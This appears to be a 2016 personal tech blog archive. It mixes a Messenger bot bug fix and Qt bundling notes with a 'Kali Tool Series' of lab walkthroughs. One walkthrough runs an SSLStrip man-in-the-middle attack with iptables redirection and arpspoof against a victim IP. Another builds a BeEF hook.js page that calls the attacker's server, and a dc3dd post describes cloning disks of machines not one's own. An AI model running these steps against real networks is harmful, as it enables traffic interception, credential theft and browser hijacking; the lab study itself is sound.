Tuesday, May 17, 2016

“(#100) No matching user found” - Facebook Messenger Bot Bug

On May 13th, I found that my Facebook Messenger bot failed to respond to some users. When I read the error log of my webhook process, I got something like:
"error": {
    "message": "(#100) No matching user found",
    "type": "OAuthException",
    "code": 100,
    "fbtrace_id": "XXXXXXXXXXX"
}

Some Backgrounds

At this point, Facebook Messenger Bot is still new, so it is reasonable for it to have some bugs. I’m using Node.js for my webhook on Heroku, and I followed the tutorial provided by Facebook for setting up the bot.

Why?

Soon, I found this bug discussed on the Facebook Bug Page here. The problem is that Facebook decided to switch their encoding to use strings instead of ints for user & page IDs, which made the example (template) code on Facebook’s official tutorial page fail to respond to users with string IDs.

Then?

Facebook sent out notifications to app developers saying:
On Tue May 17 format of user and page ids delivered via webhooks will change from an int to a string to better support default json encoder in js (that trims long ints). Please make sure your app works with string ids returned from webhooks as well as with ints.

Solution

I believe that Facebook will make the original code in the tutorial work pretty soon; however, people have already provided a solution online. Here’s the template code that should work:
var express = require('express');
var bodyParser = require('body-parser');
var request = require('request');
var JSONbig = require('json-bigint'); // parses long integer ids without losing digits

var app = express();

app.set('port', (process.env.PORT || 5000));

app.use(express.static(__dirname + '/public'));
// Keep the JSON body as raw text so it can be parsed with JSONbig below
// instead of the default JSON.parse, which trims long integer ids.
app.use(bodyParser.text({ type: 'application/json' }));

app.listen(app.get('port'), function() {
  console.log('Node app is running on port', app.get('port'));
});

var token = "<YOUR_TOKEN_HERE>";

function sendTextMessage(sender, text) {
  var messageData = {
    text: text
  };
  request({
      url: 'https://graph.facebook.com/v2.6/me/messages',
      qs: { access_token: token },
      method: 'POST',
      json: {
        recipient: { id: sender },
        message: messageData
      }
  }, function(error, response, body) {
    if (error) {
      console.log('Error sending message: ', error);
    } else if (response.body.error) {
      console.log('Error: ', response.body.error);
    }
  });
}

app.post('/webhook/', function (req, res) {

  // req.body is the raw JSON text because of bodyParser.text above
  var data = JSONbig.parse(req.body);
  var messaging_events = data.entry[0].messaging;

  for (var i = 0; i < messaging_events.length; i++) {

    var event = messaging_events[i];
    // ids may arrive as (big) ints or as strings; always send them back as strings
    var sender = event.sender.id.toString();

    if (event.message && event.message.text) {
      var text = event.message.text;
      sendTextMessage(sender, text);
    }

  }

  res.sendStatus(200);

});
Make sure you’ve installed body-parser, express, json-bigint, and request with npm and listed them in your package.json.
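The “trims long ints” problem from the notification above, as an added example that is not code from the post or from Facebook: it shows the digit loss JSON.parse causes for ids above 2^53, and a json-bigint-free fallback that quotes numeric id fields before parsing. The webhook payloads are constructed.

```javascript
// Added example, not from the post or Facebook's tutorial: why a numeric
// user id breaks the bot, and a dependency-free way to keep ids exact
// when json-bigint is not available.

// Constructed webhook payload in the old format: the page-scoped id is a
// JSON number above 2^53.
const RAW_NUMERIC = '{"entry":[{"messaging":[{"sender":{"id":12345678901234567890},' +
  '"message":{"text":"hi"}}]}]}';
// The same event in the post-May-17 format, id delivered as a string.
const RAW_STRING = '{"entry":[{"messaging":[{"sender":{"id":"12345678901234567890"},' +
  '"message":{"text":"hi"}}]}]}';

// True when the built-in parser returns the id with every digit intact.
// JSON numbers become IEEE doubles, so anything above 2^53 - 1 is "trimmed".
function idSurvivesJsonParse(idDigits) {
  const parsed = JSON.parse(idDigits);
  return Number.isSafeInteger(parsed) && String(parsed) === idDigits;
}

// Quote bare numeric "id" values before JSON.parse runs. In valid JSON an
// unescaped "id" key cannot occur inside a string literal, so the rewrite
// only touches real keys, and the following JSON.parse still rejects
// malformed input.
function quoteIdNumbers(rawJson) {
  return rawJson.replace(/("id"\s*:\s*)(-?\d+)(?=\s*[,}\]])/g, '$1"$2"');
}

function parseWebhookBody(rawJson) {
  return JSON.parse(quoteIdNumbers(rawJson));
}

// Collect sender ids as strings, the form the Send API needs in
// recipient.id; works for both the int and the string wire format.
function senderIds(rawJson) {
  const data = parseWebhookBody(rawJson);
  const ids = [];
  for (const entry of data.entry || []) {
    for (const event of entry.messaging || []) {
      if (event.sender && event.sender.id !== undefined) {
        ids.push(String(event.sender.id));
      }
    }
  }
  return ids;
}
```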

Finally

My bot, Ducky, is now working well and is public; please feel free to message him here: http://m.me/ducky.bot!


Thursday, May 5, 2016

Qt Mac Application Failed to Create Self-contained App Bundle (Qt Creator Build)

Recently, I encountered a problem creating an app bundle using Qt Creator with Qt 5.6, so I posted my question with details on StackOverflow here.

In this post, I am going to point out the places I got wrong, and some of what I studied.

Scott

Scott has been a friend of mine for years, and he is the best programmer I’ve ever met in Taiwan. He helped me with this question, and I would like to quote his words here:

Do try to figure out what you did wrong before. Look at the RPATH, install names etc in your executable and update your StackOverflow question with those findings. Finding out what you did wrong is an important step in understanding a system. This makes your exercise of publishing apps on multiple platforms more meaningful.

@executable_path, @loader_path, @rpath

The first reason I couldn’t build the app bundle is that I didn’t fully understand the path names used on Mac, and here is my study of @executable_path, @loader_path, and @rpath.

  • @executable_path: the folder path of the application’s executable
    • ex. /Applications/Foo.app/Contents/MacOS
    • useful for frameworks embedded inside the applications
  • @loader_path: the folder path of the code (e.g. a plug-in) that loads the framework
    • ex. /Library/Application Support/Foo/Plug-Ins/Bar.bundle/Contents/MacOS
    • useful for frameworks embedded inside plug-ins
    • available from Mac OS X 10.4
  • @rpath: instructs the dynamic linker to search a list of paths in order to locate the framework
    • no need to specify the “install path” using either @executable_path or @loader_path, but pass additional flags when building the host application (ex. -rpath @executable_path/…/Frameworks or /Library/Frameworks)
    • available from Mac OS X 10.5

otool

The second reason I was stuck is that otool doesn’t resolve @rpath names, so I was confused when it always returned the same thing.

However, Scott wrote another version of otool that resolves the rpaths here. Here are the steps that demonstrate the difference:

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
        @rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
        /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
        /System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
        /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
        /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
/Users/heron/Qt/5.6/clang_64/lib

> macdeployqt ./*.app -verbose=3 -always-overwrite -appstore-compliant

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
        @rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
        /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
        /System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
        /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
        /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
@executable_path/../Frameworks

macdeployqt

The last reason I failed to understand what was going on is the output of macdeployqt, which confused me.

> macdeployqt bibi.app
File exists, skip copy: "bibi.app/Contents/PlugIns/platforms/libqcocoa.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/printsupport/libcocoaprintersupport.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqdds.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqgif.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqicns.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqico.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqjpeg.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtga.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtiff.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwbmp.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwebp.dylib"
WARNING:
WARNING: "bibi.app/Contents/Resources/qt.conf" already exists, will not overwrite.
WARNING: To make sure the plugins are loaded from the correct location,
WARNING: please make sure qt.conf contains the following lines:
WARNING: [Paths]
WARNING:   Plugins = PlugIns

However, in Scott’s solution, he gave the following additional arguments:

  • -verbose=3: see in detail how the rpaths are updated (Scott’s log)
  • -always-overwrite: copy files even if the target file exists, so the first (Scott: I used “always-overwrite” to get predictable results after repeated testing, since the Qt frameworks would be copied into the app bundle.)
  • -appstore-compliant: skip deployment of components that use private API (Scott: appstore-compliant was just for your convenience)

Test

Testing is one additional thing that made the original question harder to solve: there’s no easy way to see whether my app bundle works on another machine without Qt installed.

Instead of asking friends to run the app, Scott mentioned that we can use lsof at run-time.

> ps aux|grep bibi
heron           21610   0.0  0.5  2632680  40272   ??  S    Tue09PM   5:32.80 /Users/heron/Project/bibi/bibi/build-bibi-Desktop_Qt_5_6_0_clang_64bit-Release/bibi.app/Contents/MacOS/bibi
heron           39245   0.0  0.0  2434840    664 s003  R+    9:31AM   0:00.00 grep --color=auto bibi

> lsof -p 39183 | grep QtCore
bibi    21610 heron  txt      REG                1,4   6441676 168354669 /Users/heron/Qt-free/5.6/clang_64/lib/QtCore.framework/Versions/5/QtCore

After macdeployqt, the app bundle no longer needs to link to frameworks outside the bundle:

> ps aux|grep bibi
heron           39352   0.0  0.0  2435864    788 s003  S+    9:32AM   0:00.00 grep --color=auto bibi
heron           39315   0.0  0.8  2611176  63000   ??  S     9:32AM   0:00.68 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/MacOS/bibi

> lsof -p 39315 | grep QtCore
bibi    39315 heron  txt      REG    1,4   6017532 171823963 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/Frameworks/QtCore.framework/Versions/5/QtCore

Summary

I would say the biggest problem is that I didn’t know how to read @rpath, so Scott’s otool-rpath or lsof helped in the end.

Reference

Sunday, April 10, 2016

Kali Tool Series - dc3dd

“dc3dd is a patched version of GNU dd with added features for computer forensics” - from ForensicsWiki.

Comparison to GNU dd

While I was using dd, I found it hard to know how long it would take, and whether the cloning completed without error. However, dc3dd fixes these problems by providing:

  • on the fly hashing with multiple algorithms (MD5, SHA-1, SHA-256, and SHA-512)
  • progress reports
  • writing errors directly to a file

When and Why using dd or dc3dd

In movies or TV series, we see hackers plug in a USB disk and copy all the data off the machine; that is the case where dd or dc3dd is used.

To be more specific, the flow is:

  • insert a Kali live USB disk into the target machine
  • do the Kali Forensics Boot
  • dd or dc3dd the disk of the target machine into a file on the Kali USB disk or another USB disk

Usage

I use VMs, so I won’t have a target machine in this example. However, you can pretend the disk I am going to clone (/dev/sda5) is the disk of the target machine. And I am cloning the disk into a file stored on another USB disk.

First of all, list out the partitions of all the disks.

> fdisk -l

Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x7b852532

Device     Boot    Start      End  Sectors  Size Id Type
/dev/sda1  *        2048 40136703 40134656 19.1G 83 Linux
/dev/sda2       40138750 41940991  1802242  880M  5 Extended
/dev/sda5       40138752 41940991  1802240  880M 82 Linux swap / Solaris

Disk /dev/sdb: 3.8 GiB, 4026531840 bytes, 7864320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x893a988d

Device     Boot Start     End Sectors  Size Id Type
/dev/sdb1         976 7864319 7863344  3.8G  b W95 FAT32

Pick the one you want to clone later; here I am using the Linux swap (/dev/sda5), which is kind of meaningless but enough for practice purposes.

Then, locate the place you want to save your cloned disk image. Usually, you would want to use another USB disk since the machine may not belong to you, and what you want to do is clone the disk, save it on the USB disk, then take it away. I will save the file on the /dev/sdb disk, which is mounted at /media/root/0909-B70D/disk-img/.

Start dc3dd:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed),      922,746,880 bytes
sector size: 512 bytes (probed)
   261455872 bytes ( 249 M ) copied ( 28% ),   33 s, 7.6 M/s                  

  • if: input disk location
  • of: output image location
  • hash: calculate the hash on the fly

Verification

After the cloning completes, we can check whether the file is exactly the same as the original by comparing the hashes:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed),      922,746,880 bytes
sector size: 512 bytes (probed)
   922746880 bytes ( 880 M ) copied ( 100% ),  236 s, 3.7 M/s                 

input results for device `/dev/sda5':
   1802240 sectors in
   0 bad sectors replaced by zeros
   f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f (sha256)

output results for file `/media/root/0909-B70D/disk-img/cloned':
   1802240 sectors out

dc3dd completed at 2016-04-10 13:00:45 +0800

> file /media/root/0909-B70D/disk-img/cloned 
/media/root/0909-B70D/disk-img/cloned: Linux/i386 swap file (new style), version 1 (4K pages), size 225279 pages, no label, UUID=767f785e-d7fb-4b3c-9f8e-b02761db620e
> sha256sum /media/root/0909-B70D/disk-img/cloned 
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f  /media/root/0909-B70D/disk-img/cloned

As you can see, the swap file is copied, and the hashes are the same (f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f).

Kali Forensics Boot

By doing the Kali Forensics Boot, one gains the benefit of being silent. That is, the Kali Forensics Boot provides the following features:

  • the internal hard disk is never touched
  • auto-mounting of removable media is disabled

Reference

Wednesday, April 6, 2016

Kali Tool Series - SSLStrip

Refer to “How does SSLstrip work?” on StackExchange: SSLStrip is a type of MitM attack that forces a victim’s browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is “stripping” https:// URLs and turning them into http:// URLs.
> sslstrip -h

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

Overview

We will use ARP spoofing to obtain the victim’s traffic, which means the traffic will go through our Kali machine and then be passed on to the victim or the server he/she is communicating with. Then, we will listen on port 80, the basic HTTP port. All port 80 traffic will be redirected to SSLStrip, and SSLStrip will handle the rest of the HTTPS traffic.
The expected result was that the attacker would be able to read the requests between the victim and the HTTPS websites he/she is visiting, which may contain valuable cookies or passwords. However, in my experiment, SSLStrip crashed, and it seems that this method is out of date.

Find the Gateway IP

> route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.63.2    0.0.0.0         UG    0      0        0 eth0
0.0.0.0         192.168.63.2    0.0.0.0         UG    1024   0        0 eth0
192.168.63.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
192.168.63.2    0.0.0.0         255.255.255.255 UH    1024   0        0 eth0

or,
> netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.63.2    0.0.0.0         UG        0 0          0 eth0
0.0.0.0         192.168.63.2    0.0.0.0         UG        0 0          0 eth0
192.168.63.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0
So, the Gateway IP is 192.168.63.2 in my case.

Find the Victim IP

As I run Kali in a VM, I will let the victim be an Ubuntu server, which is another VM on my machine. I run this on the Ubuntu machine:
> ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:4f:5f:5b
          inet addr:192.168.63.152  Bcast:192.168.63.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe4f:5f5b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:118 errors:0 dropped:0 overruns:0 frame:0
          TX packets:81 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:15530 (15.5 KB)  TX bytes:14538 (14.5 KB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:16 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1184 (1.1 KB)  TX bytes:1184 (1.1 KB)
That is, the victim IP is 192.168.63.152. If you have no access to the victim machine, you can use commands like nmap -sP 192.168.63.0/24 to search.

IP Routing

We are going to redirect Kali’s inbound traffic from port 80 to the port SSLStrip is running on (let’s use 5050 here).
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5050
To check if the routing rule is set:
> iptables -L -vt nat
Chain PREROUTING (policy ACCEPT 100 packets, 13501 bytes)
 pkts bytes target     prot opt in     out     source               destination
   16   960 REDIRECT   tcp  --  any    any     anywhere             anywhere             tcp dpt:http redir ports 5050
… 
If you want to clean up and reset, here’s the way to clear all PREROUTING rules (listing only the PREROUTING chain, so the line numbers match the chain we delete from):
for i in $( iptables -t nat -L PREROUTING --line-numbers | grep '^[0-9]' | awk '{ print $1 }' | tac ); do iptables -t nat -D PREROUTING $i; done

IP Forwarding

Since we are going to do ARP spoofing later, we have to enable IP forwarding first, so that whenever the Kali machine receives packets, it forwards them to their proper destination. This is what makes it a MitM (Man in the Middle).
> echo 1 > /proc/sys/net/ipv4/ip_forward
> cat /proc/sys/net/ipv4/ip_forward # check
1

ARP Spoof

Now, in order to let the traffic flow through our Kali machine (MitM), we need ARP spoofing. The syntax is:
> arpspoof -i interface -t target_IP -r gateway_IP
In our case:
> arpspoof -i eth0 -t 192.168.63.152 -r 192.168.63.2
0:c:29:80:9a:85 0:50:56:e9:3:c 0806 42: arp reply 192.168.63.156 is-at 0:c:29:5a:28:9e
0:c:29:80:9a:85 0:c:29:5a:28:9e 0806 42: arp reply 192.168.63.2 is-at 0:50:56:e9:3:c
… 
The process blocks, and we should keep it running.
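From the defender’s side, here is an added example (not from the post) that replays ARP reply lines in the format arpspoof prints above and flags the two signs of cache poisoning: an IP whose MAC changes, and a reply whose asserted MAC differs from the frame’s Ethernet source MAC. The sample lines are constructed; the MAC addresses are the ones that appear in this post.

```javascript
// Added example, not from the post: a small ARP cache poisoning detector
// fed with lines of the form
//   "<src mac> <dst mac> 0806 42: arp reply <ip> is-at <mac>"
const ARP_REPLY_RE =
  /^(\S+)\s+(\S+)\s+0806\s+\d+:\s+arp reply\s+(\S+)\s+is-at\s+(\S+)$/;

// Normalise "0:c:29:5a:28:9e" and "00:0c:29:5a:28:9e" to one form.
function normMac(mac) {
  return mac.split(":").map((o) => o.padStart(2, "0")).join(":").toLowerCase();
}

// Returns {srcMac, dstMac, ip, claimedMac} or null for non-matching lines.
function parseArpReply(line) {
  const m = ARP_REPLY_RE.exec(line.trim());
  if (!m) return null;
  return { srcMac: normMac(m[1]), dstMac: normMac(m[2]), ip: m[3], claimedMac: normMac(m[4]) };
}

// knownBindings: optional ip -> expected MAC map seeded from a trusted
// baseline (e.g. a static ARP entry for the gateway). Alerts when the MAC
// bound to an IP changes, or when the sender of a reply is not the host
// it claims to be.
function detectArpSpoof(lines, knownBindings = {}) {
  const table = new Map(
    Object.entries(knownBindings).map(([ip, mac]) => [ip, normMac(mac)])
  );
  const alerts = [];
  for (const line of lines) {
    const r = parseArpReply(line);
    if (!r) continue;
    if (r.srcMac !== r.claimedMac) {
      alerts.push({ type: "src-mismatch", ip: r.ip, from: r.srcMac, claimed: r.claimedMac });
    }
    const prev = table.get(r.ip);
    if (prev === undefined) {
      table.set(r.ip, r.claimedMac);
    } else if (prev !== r.claimedMac) {
      alerts.push({ type: "mac-changed", ip: r.ip, from: prev, to: r.claimedMac });
      table.set(r.ip, r.claimedMac);
    }
  }
  return alerts;
}

// Constructed sample: a legitimate reply from the gateway, then a forged
// one that rebinds the gateway IP to another host's MAC.
const SAMPLE = [
  "0:50:56:e9:3:c 0:c:29:4f:5f:5b 0806 42: arp reply 192.168.63.2 is-at 0:50:56:e9:3:c",
  "0:c:29:5a:28:9e 0:c:29:4f:5f:5b 0806 42: arp reply 192.168.63.2 is-at 0:c:29:5a:28:9e",
];
```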

SSLStrip

Start SSLStrip on port 5050 (or any port you like, as long as it matches the one we used in IP Routing).
> sslstrip -l 5050

sslstrip 0.9 by Moxie Marlinspike running...

Victim Browse HTTPS Websites

Since my victim only has a command-line interface, I am using lynx as the browser.
> lynx http://www.paypal.com
On Kali’s Wireshark, we can tell that ARP spoofing is working because all the duplicated packets are shown. (In the screenshot, the upper part was captured while ARP spoofing was off, and all the traffic looks normal. The lower part was captured while ARP spoofing was on; we can see that Kali received all the traffic to/from the victim, 192.168.63.152, then passed it through.)


SSLStrip Result

SSLStrip crashed right when the user was about to connect to the HTTPS website. I’ve tried the latest SSLStrip 0.9.2, but it crashes in the same way. I also found that other users are suffering from this issue as well: sslstrip on non hsts site error #17 and Execptions in twisted #15.
Here’s the error:
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
  File "sslstrip.py", line 105, in main
    reactor.run()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1192, in run
    self.mainLoop()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1204, in mainLoop
    self.doIteration(t)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/epollreactor.py", line 396, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
    self._disconnectSelectable(selectable, why, inRead)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
    selectable.connectionLost(f)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 484, in connectionLost
    self._commonConnection.connectionLost(self, reason)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 298, in connectionLost
    protocol.connectionLost(reason)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 474, in connectionLost
    self.handleResponseEnd()
  File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 485, in handleResponseEnd
    self.handleResponse(b)
  File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 133, in handleResponse
    self.client.write(data)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 962, in write
    raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called.
The experiment didn’t work, and I may come back to this if I find something new.

Reference

DoS v.s. DDoS

People like to mix up DoS with DDoS, which are similar but different. Referring to Wikipedia, we get:

DoS: A denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.

DDoS: A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses.

Difference

DoS is launched by one machine; by contrast, DDoS is launched by distributed machines.

Referring to DDoS attack - Distributed Denial of Service, we get: “A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.”

Who Mixed Them Up?

I’ve been seeing this mistake for a long time; people keep mixing up these two names. If the attack was only launched from one machine, then it’s called DoS instead of DDoS. Some examples of people who got it wrong here:

Why This Matters?

DoS is easy to launch and easy to defend against. On the other hand, DDoS is always a big threat in the current world since victims have a difficult time distinguishing the bad guys from the large number of legitimate users. DDoS is a serious problem we should focus on (see the Digital Attack Map hosted by Google); and those who claim that what they were doing were DDoS attacks when they were actually DoS attacks should stop delivering wrong information to the public.

How To Launch DDoS Then?

Too bad, I’ve never launched a DDoS attack before, which I believe is illegal as well. However, the following is information about it if you’re interested in knowing more. And one should NOT apply it to real machines/networks unless he/she fully understands the consequences.

First of all, you need a botnet, or distributed machines under your control. Bad guys buy botnets on the black market. Those machines are usually ones that have been hacked, so attackers can control them via the backdoor left on the machine.

Then, the attacker asks all the bot machines to send requests to the victim. The requests come at a high frequency, so the victim can’t handle all of them (it runs out of memory or CPU), and eventually the service freezes. UFONet is one tool I found online, written in Python, that is designed to test/launch DDoS attacks.

Monday, April 4, 2016

Keyword Spotting for Controlling Window Background Color

This is a small test program that uses both CMUSphinx and GTK+ to demonstrate the keyword spotting (KWS) algorithm.

KWS is the technique used to detect a keyword at any time. Yes, this is the technique behind “Okay, Google” and “Hey, Siri”. Whenever the keyword is heard by the machine, some callback function is fired.

History

  • Originally, Hidden Markov Model (HMM) systems
  • Google, 2014, Deep Neural Network (DNN), demonstrated outperforming the HMM system
  • Google, 2015, Convolutional Neural Networks (CNNs), demonstrated outperforming the DNN
    • DNNs ignore input topology, as the (fixed) input can be presented in any order without affecting the performance of the network
    • DNNs are not explicitly designed to model translational variance within speech signals, which can exist due to different speaking styles / CNNs capture translational invariance with far fewer parameters by averaging the outputs of hidden units

Tools

CMU Sphinx Project by Carnegie Mellon University

  • CMU LTI, Language Technology Institute
  • Designed to be adopted on different platforms including iOS, Android, Raspberry Pi, etc.
  • License: BSD-style (nice!)

Raspberry Pi 2 – Speech Recognition on device

  • Upload word list to http://www.speech.cs.cmu.edu/tools/lmtool-new.html
  • Link .lm and .dict file, command: pocketsphinx_continuous -inmic yes -lm 0730.lm -dict 0730.dic -samprate 16000/8000/48000

My Code

Github link: https://github.com/heronyang/kws-color-demo

Components

In main.c, the program fires up a thread for handling GUI jobs right after it starts. Then, it sets up pocketsphinx and calls recognize_from_microphone or recognize_from_file for the audio input. Since argc/argv is passed into the settings, the user can specify the dictionary file or log file as written in run.sh.

Run

> ./run.sh

Demo


Friday, April 1, 2016

Kali Tool Series - BeEF

“BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.”

How It Works

Basically, first start the BeEF server, then let the victim run hook.js in his/her browser, and we can get information about the victim’s machine or control it.

Start BeEF Server

> beef-xss 
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
… 
Then, open the browser at http://127.0.0.1:3000/ui/panel on Kali, and you’ll see the BeEF Control Panel.

Let Victim Run hook.js

I’m not including the strategies for getting people to run hook.js in the real world, which I believe involve some social engineering. Instead, I am running a simple server on Kali on a port other than 3000 (used by the BeEF server), then letting the victim open the web page which has hook.js embedded.

Setup the Web Page
Usually, some fraud may be involved here, but I am ignoring that for study purposes. What I built now is barely a blank page with the label “hello”. Save the following page as index.html somewhere on Kali.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
    <h1>hello</h1>
    <script src="http://192.168.63.155:3000/hook.js"></script>
</body>
</html>
192.168.63.155 is the IP of Kali, which is a local IP, so only other machines on the same local network can access it later on.

Setup the Web Server
I am using Python’s SimpleHTTPServer, so:
> python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
And the web server will start and listen on port 8000.

Victim Visit
As Kali is running in a VM, I visit the site just set up from my host machine (Mac). Simply opening http://192.168.63.155:8000 will work.

Control the Victim

On Kali, you can see a new item pop up in the left-hand list. You can start to read the victim’s information or control it.

What You Can Do

On the Commands tab in the BeEF Control Panel, you can see a list of actions you can perform on the victim. Well, in my experiment, quite a lot of them don’t work, possibly because browsers have fixed the security flaws, or just because the BeEF code wasn’t up to date.
On the BeEF Control Panel, the different coloured circles next to the actions represent different statuses:
  • green : works on the target; invisible.
  • orange : works on the target; visible.
  • grey : must yet be verified if it works.
  • red : does not work on the target.
Here, I will list some actions I found working.

Play Sound

This command plays a sound on the target machine given the sound URL. I randomly searched on www.findsounds.com and got this link:
http://princezze.free.fr/sounds/laugh.MP3
Put it into the panel, and it works.


iFrame Event Logger

